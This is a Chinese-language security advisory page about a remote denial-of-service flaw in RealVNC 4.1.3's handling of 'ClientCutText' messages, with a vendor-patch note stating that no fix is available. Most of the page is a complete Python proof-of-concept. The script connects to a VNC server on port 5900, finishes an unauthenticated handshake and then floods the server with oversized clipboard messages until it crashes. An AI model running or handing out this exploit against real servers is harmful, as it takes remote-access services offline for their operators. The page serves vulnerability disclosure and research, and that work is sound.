内容安全 
大数据安全 
网络安全 
更多产品 
RealVNC 4.1.3 \'ClientCutText\'消息远程拒绝服务漏洞
信息来源:John Leitch 发表日期:2013-06-01 14:24:00
RealVNC VNC Server是一款远程控制服务程序。
RealVNC 4.1.3及其他版本在处理\'ClientCutText\'消息时,在实现上存在远程拒绝服务漏洞,攻击者可利用此漏洞使受影响应用崩溃,导致拒绝服务。
BUGTRAQ-ID:39895
受影响系统:
RealVNC RealVNC 4.1.3
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!import sys, struct, socket
host =\'localhost\'
port = 5900
def crash_vnc_server():
try:
while 1:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(1.0)
print \'Connected\'
try:
b = s.recv(8192)
print \'ProtocolVersion Received\'
s.send(b)
print \'ProtocolVersion Sent\'
b = s.recv(8192)
print \'Security Received\'
s.send(\'\\x01\')
print \'Security Sent\'
# Recv SecurityResult
b = s.recv(8192)
print \'SecurityResult Received\'
if (len(b) == 4 and
b[0] == chr(0) and
b[1] == chr(0) and
b[2] == chr(0) and
b[3] == chr(0)):
print \'SecurityResult OK\'
else:
print \'SecurityResult Failed.\\n\\nThe server must be set \'\\
\'to No Authentication for this to work, otherwise \'\\
\'you \\\'ll need to write the necessary client side \'\\
\'authentication code yourself.\'
return
s.send(\'\\x01\')
print \'ClientInit Sent\'
b = s.recv(8192)
print \'ServerInit Received\'
text_len = 0xFFFFFF
text_str = struct.pack(\'L\', text_len) + \'\\xAA\' * text_len
while 1:
s.send(\'\\x06\\x00\\x00\\x00\' + text_str)
print \'ClientCutText Sent\'
except Exception:
print \'Connection closed\'
except Exception:
print \'Couldn\\\'t connect\'
crash_vnc_server()
解决办法:
厂商补丁:
RealVNC
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.realvnc.com/
